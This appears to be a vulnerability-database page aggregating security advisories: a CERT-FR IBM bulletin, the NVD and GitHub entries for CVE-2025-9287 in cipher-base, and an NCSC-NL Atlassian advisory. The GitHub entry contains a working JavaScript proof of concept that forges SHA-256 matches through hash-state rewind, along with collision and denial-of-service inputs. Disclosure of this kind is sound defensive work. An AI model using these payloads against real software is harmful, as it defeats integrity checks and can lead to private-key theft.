      "url": "https://www.cve.org/CVERecord?id=CVE-2025-38022"
    },
    {
      "name": "CVE-2025-5372",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-5372"
    },
    {
      "name": "CVE-2025-40322",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-40322"
    },
    {
      "name": "CVE-2025-38459",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-38459"
    },
    {
      "name": "CVE-2025-40271",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-40271"
    },
    {
      "name": "CVE-2024-11831",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-11831"
    },
    {
      "name": "CVE-2026-21925",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-21925"
    },
    {
      "name": "CVE-2022-50673",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-50673"
    },
    {
      "name": "CVE-2025-38024",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-38024"
    },
    {
      "name": "CVE-2024-51744",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-51744"
    },
    {
      "name": "CVE-2025-6545",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-6545"
    },
    {
      "name": "CVE-2025-40269",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-40269"
    },
    {
      "name": "CVE-2025-55173",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-55173"
    },
    {
      "name": "CVE-2025-4897",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-4897"
    },
    {
      "name": "CVE-2025-48068",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-48068"
    },
    {
      "name": "CVE-2025-27152",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
    },
    {
      "name": "CVE-2025-57752",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-57752"
    },
    {
      "name": "CVE-2025-32997",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-32997"
    },
    {
      "name": "CVE-2026-1188",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-1188"
    },
    {
      "name": "CVE-2023-53552",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-53552"
    },
    {
      "name": "CVE-2024-45296",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
    },
    {
      "name": "CVE-2025-66471",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-66471"
    },
    {
      "name": "CVE-2026-21441",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-21441"
    },
    {
      "name": "CVE-2025-57350",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-57350"
    },
    {
      "name": "CVE-2025-66453",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-66453"
    },
    {
      "name": "CVE-2025-9288",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
    },
    {
      "name": "CVE-2025-15366",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-15366"
    },
    {
      "name": "CVE-2026-0865",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-0865"
    },
    {
      "name": "CVE-2025-40158",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-40158"
    },
    {
      "name": "CVE-2025-58457",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58457"
    },
    {
      "name": "CVE-2025-48913",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-48913"
    },
    {
      "name": "CVE-2025-59250",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-59250"
    },
    {
      "name": "CVE-2025-14104",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-14104"
    },
    {
      "name": "CVE-2024-52798",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
    },
    {
      "name": "CVE-2025-64775",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-64775"
    },
    {
      "name": "CVE-2025-39760",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-39760"
    },
    {
      "name": "CVE-2025-40135",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-40135"
    },
    {
      "name": "CVE-2025-9086",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-9086"
    },
    {
      "name": "CVE-2020-7660",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-7660"
    },
    {
      "name": "CVE-2024-29371",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29371"
    },
    {
      "name": "CVE-2025-38403",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-38403"
    },
    {
      "name": "CVE-2025-14031",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-14031"
    },
    {
      "name": "CVE-2025-23184",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-23184"
    },
    {
      "name": "CVE-2025-38415",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-38415"
    },
    {
      "name": "CVE-2022-50865",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-50865"
    },
    {
      "name": "CVE-2025-29927",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-29927"
    },
    {
      "name": "CVE-2025-27533",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-27533"
    },
    {
      "name": "CVE-2023-44483",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-44483"
    },
    {
      "name": "CVE-2026-1299",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-1299"
    },
    {
      "name": "CVE-2025-40170",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-40170"
    },
    {
      "name": "CVE-2026-21945",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-21945"
    },
    {
      "name": "CVE-2026-1264",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-1264"
    },
    {
      "name": "CVE-2025-53906",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-53906"
    },
    {
      "name": "CVE-2025-48924",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
    },
    {
      "name": "CVE-2025-8916",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-8916"
    },
    {
      "name": "CVE-2025-66675",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-66675"
    },
    {
      "name": "CVE-2025-68301",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-68301"
    },
    {
      "name": "CVE-2025-38051",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-38051"
    },
    {
      "name": "CVE-2026-22998",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
    },
    {
      "name": "CVE-2025-40258",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-40258"
    },
    {
      "name": "CVE-2025-6547",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-6547"
    },
    {
      "name": "CVE-2025-40096",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-40096"
    },
    {
      "name": "CVE-2025-57352",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-57352"
    },
    {
      "name": "CVE-2024-26766",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-26766"
    },
    {
      "name": "CVE-2025-66418",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-66418"
    }
  ],
  "initial_release_date": "2026-03-20T00:00:00",
  "last_revision_date": "2026-03-20T00:00:00",
  "links": [],
  "reference": "CERTFR-2026-AVI-0327",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2026-03-20T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "D\u00e9ni de service \u00e0 distance"
    },
    {
      "description": "Injection de code indirecte \u00e0 distance (XSS)"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
    },
    {
      "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
    },
    {
      "description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
  "vendor_advisories": [
    {
      "published_at": "2026-03-17",
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 7266518",
      "url": "https://www.ibm.com/support/pages/node/7266518"
    },
    {
      "published_at": "2026-03-13",
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 7263574",
      "url": "https://www.ibm.com/support/pages/node/7263574"
    },
    {
      "published_at": "2026-03-17",
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 7266520",
      "url": "https://www.ibm.com/support/pages/node/7266520"
    },
    {
      "published_at": "2026-03-18",
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 7266678",
      "url": "https://www.ibm.com/support/pages/node/7266678"
    },
    {
      "published_at": "2026-03-17",
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 7266497",
      "url": "https://www.ibm.com/support/pages/node/7266497"
    },
    {
      "published_at": "2026-03-16",
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 7266324",
      "url": "https://www.ibm.com/support/pages/node/7266324"
    },
    {
      "published_at": "2026-03-18",
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 7266711",
      "url": "https://www.ibm.com/support/pages/node/7266711"
    },
    {
      "published_at": "2026-03-18",
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 7266677",
      "url": "https://www.ibm.com/support/pages/node/7266677"
    },
    {
      "published_at": "2026-03-17",
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 7266399",
      "url": "https://www.ibm.com/support/pages/node/7266399"
    },
    {
      "published_at": "2026-03-16",
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 7266321",
      "url": "https://www.ibm.com/support/pages/node/7266321"
    }
  ]
}

FKIE_CVE-2025-9287

Vulnerability from fkie_nvd - Published: 2025-08-20 22:15 - Updated: 2025-11-03 19:16

Severity

9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Summary

Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4.

References

URL	Tags
7ffcee3d-2c14-4c3e-b844-86c6a321a158	https://github.com/browserify/cipher-base/pull/23	Issue Tracking, Patch
7ffcee3d-2c14-4c3e-b844-86c6a321a158	https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	browserify	cipher-base	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:browserify:cipher-base:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "485D8065-DEFF-404E-934D-DCA8E4C10860",
              "versionEndIncluding": "1.0.4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4."
    },
    {
      "lang": "es",
      "value": "La vulnerabilidad de validaci\u00f3n de entrada incorrecta en cipher-base permite la manipulaci\u00f3n de datos de entrada. Este problema afecta a cipher-base: hasta 1.0.4."
    }
  ],
  "id": "CVE-2025-9287",
  "lastModified": "2025-11-03T19:16:17.187",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "HIGH",
          "attackRequirements": "PRESENT",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "HIGH",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-08-20T22:15:30.557",
  "references": [
    {
      "source": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
      "tags": [
        "Issue Tracking",
        "Patch"
      ],
      "url": "https://github.com/browserify/cipher-base/pull/23"
    },
    {
      "source": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
    }
  ],
  "sourceIdentifier": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "7ffcee3d-2c14-4c3e-b844-86c6a321a158",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-CPQ7-6GPM-G9RC

Vulnerability from github – Published: 2025-08-21 14:47 – Updated: 2025-11-03 21:34

Summary

cipher-base is missing type checks, leading to hash rewind and passing on crafted data

Details

Summary

This affects e.g. create-hash (and crypto-browserify), so I'll describe the issue against that package Also affects create-hmac and other packages

Node.js createHash works only on strings or instances of Buffer, TypedArray, or DataView.

Missing input type checks (in npm create-hash polyfill of Node.js createHash) can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.

Details

See PoC

PoC

const createHash = require('create-hash/browser.js')
const { randomBytes } = require('crypto')

const sha256 = (...messages) => {
  const hash = createHash('sha256')
  messages.forEach((m) => hash.update(m))
  return hash.digest('hex')
}

const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever

const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever

console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])

Output:

9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
Hashed input means safe

This works with:

const forgeHash = (valid, wanted) => JSON.stringify([wanted, { length: -wanted.length }, { ...valid, length: valid.length }])

But there are other types of input which lead to unchecked results

Impact

Hash state rewind on {length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.
Value miscalculation, e.g. a collision is generated by { length: buf.length, ...buf, 0: buf[0] + 256 } This will result in the same hash as of buf, but can be treated by other code differently (e.g. bn.js)
DoS on {length:'1e99'}
On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration, like GHSA-vjh7-7g9h-fjfh)
Also, other typed arrays results are invalid, e.g. returned hash of new Uint16Array(5) is the same as new Uint8Array(5), not new Uint16Array(10) as it should have been (and is in Node.js crypto) -- same for arrays with values non-zero, their hashes are just truncated to %256 instead of converted to correct bytelength

Severity

9.1 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

9.1 (Critical)


                  
                    CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.4"
      },
      "package": {
        "ecosystem": "npm",
        "name": "cipher-base"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-9287"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-21T14:47:35Z",
    "nvd_published_at": "2025-08-20T22:15:30Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThis affects e.g. `create-hash` (and `crypto-browserify`), so I\u0027ll describe the issue against that package\nAlso affects `create-hmac` and other packages\n\nNode.js `createHash` works only on strings or instances of Buffer, TypedArray, or DataView.\n\nMissing input type checks (in npm `create-hash` polyfill of Node.js `createHash`) can allow types other than a well-formed `Buffer` or `string`, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.\n\n### Details\n\nSee PoC\n\n### PoC\n```js\nconst createHash = require(\u0027create-hash/browser.js\u0027)\nconst { randomBytes } = require(\u0027crypto\u0027)\n\nconst sha256 = (...messages) =\u003e {\n  const hash = createHash(\u0027sha256\u0027)\n  messages.forEach((m) =\u003e hash.update(m))\n  return hash.digest(\u0027hex\u0027)\n}\n\nconst validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever\n\nconst payload = forgeHash(Buffer.concat(validMessage), \u0027Hashed input means safe\u0027)\nconst receivedMessage = JSON.parse(payload) // e.g. over network, whatever\n\nconsole.log(sha256(...validMessage))\nconsole.log(sha256(...receivedMessage))\nconsole.log(receivedMessage[0])\n```\n\nOutput:\n```\n9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9\n9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9\nHashed input means safe\n```\n\nThis works with:\n```js\nconst forgeHash = (valid, wanted) =\u003e JSON.stringify([wanted, { length: -wanted.length }, { ...valid, length: valid.length }])\n```\n\nBut there are other types of input which lead to unchecked results\n\n### Impact\n\n1. Hash state rewind on `{length: -x}`. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.\n2. Value miscalculation, e.g. a collision is generated by `{ length: buf.length, ...buf, 0: buf[0] + 256 }`\n    This will result in the same hash as of `buf`, but can be treated by other code differently (e.g. bn.js)\n4. DoS on `{length:\u00271e99\u0027}`\n5. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration, like [GHSA-vjh7-7g9h-fjfh](https://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh))\n6. Also, other typed arrays results are invalid, e.g. returned hash of `new Uint16Array(5)` is the same as `new Uint8Array(5)`, not `new Uint16Array(10)` as it should have been (and is in Node.js `crypto`) -- same for arrays with values non-zero, their hashes are just truncated to `%256` instead of converted to correct bytelength",
  "id": "GHSA-cpq7-6gpm-g9rc",
  "modified": "2025-11-03T21:34:22Z",
  "published": "2025-08-21T14:47:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9287"
    },
    {
      "type": "WEB",
      "url": "https://github.com/browserify/cipher-base/pull/23"
    },
    {
      "type": "WEB",
      "url": "https://github.com/browserify/cipher-base/commit/8fd136432ca298a664f5637629cf2b42a6c7f294"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/browserify/cipher-base"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "cipher-base is missing type checks, leading to hash rewind and passing on crafted data"
}

NCSC-2026-0034

Vulnerability from csaf_ncscnl - Published: 2026-01-22 09:03 - Updated: 2026-01-22 09:03

Summary

Kwetsbaarheden verholpen in Atlassian producten

Notes

The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions: NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein. NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory. This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings.

Feiten: Atlassian heeft kwetsbaarheden verholpen in verschillende producten, welke gebruik maken van Oracle middle-ware producten zoals de Oracle Utilities Application Framework, WebLogic Server, Data Integrator en Business Intelligence Enterprise Edition.

Interpretaties: Deze kwetsbaarheden stellen ongeauthenticeerde aanvallers in staat om een denial of service (DoS) of om zich toegang te verschaffen tot gevoelige gegevens. Een reeks kwetsbaarheden is afkomstig van diverse Oracle-middleware software, welke in Atlassian-producten is verwerkt. Deze kwetsbaarheden zijn verholpen in de Critical Patch Update van januari 2026 van Oracle en verwerkt in de getroffen Atlassian producten.

Oplossingen: Atlassian heeft updates uitgebracht om de kwetsbaarheden te verhelpen. Zie bijgevoegde referenties voor meer informatie.

Kans: medium

Schade: high

CWE-20: Improper Input Validation

CWE-23: Relative Path Traversal

CWE-121: Stack-based Buffer Overflow

CWE-285: Improper Authorization

CWE-287: Improper Authentication

CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

CWE-400: Uncontrolled Resource Consumption

CWE-404: Improper Resource Shutdown or Release

CWE-459: Incomplete Cleanup

CWE-611: Improper Restriction of XML External Entity Reference

CWE-697: Incorrect Comparison

CWE-770: Allocation of Resources Without Limits or Throttling

CWE-787: Out-of-bounds Write

CWE-863: Incorrect Authorization

CWE-918: Server-Side Request Forgery (SSRF)

CWE-937: CWE-937

CWE-1035: CWE-1035

CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

CWE-1333: Inefficient Regular Expression Complexity

CVE-2021-3807

Recent updates address critical security vulnerabilities across various software, including Ansible, Node.js, and Golang packages, with significant fixes for ReDoS and sensitive data exposure issues.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-400 - Uncontrolled Resource Consumption

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2022-25883

Multiple versions of the semver package are vulnerable to Regular Expression Denial of Service (ReDoS) through the new Range function, prompting updates in various products to mitigate this risk.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1333 - Inefficient Regular Expression Complexity

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2022-45693

Multiple Oracle products, including Utilities Application Framework, WebLogic Server, Data Integrator, and Business Intelligence Enterprise Edition, have vulnerabilities allowing unauthenticated denial of service attacks, all with a CVSS score of 7.5.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-787 - Out-of-bounds Write

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2024-21538

Recent updates across various AWS packages, Node.js versions, and Python libraries address security vulnerabilities, enhance functionality, and improve performance, while several vulnerability reports highlight critical issues in Oracle Communications, HPE Unified OSS Console, and the cross-spawn package.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P

CWE-1333 - Inefficient Regular Expression Complexity

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2024-38286

Apache Tomcat versions 11.0.0-M1 to 11.0.0-M20, 10.1.0-M1 to 10.1.24, and 9.0.13 to 9.0.89 are vulnerable to OutOfMemoryError and Denial of Service due to improper TLS handshake handling.

8.6 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CWE-400 - Uncontrolled Resource Consumption

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2024-45296

Multiple vulnerabilities in the path-to-regexp library and related components can lead to Denial of Service (DoS) attacks, particularly affecting Node.js applications and IBM App Connect Enterprise due to backtracking regex issues.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1333 - Inefficient Regular Expression Complexity

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
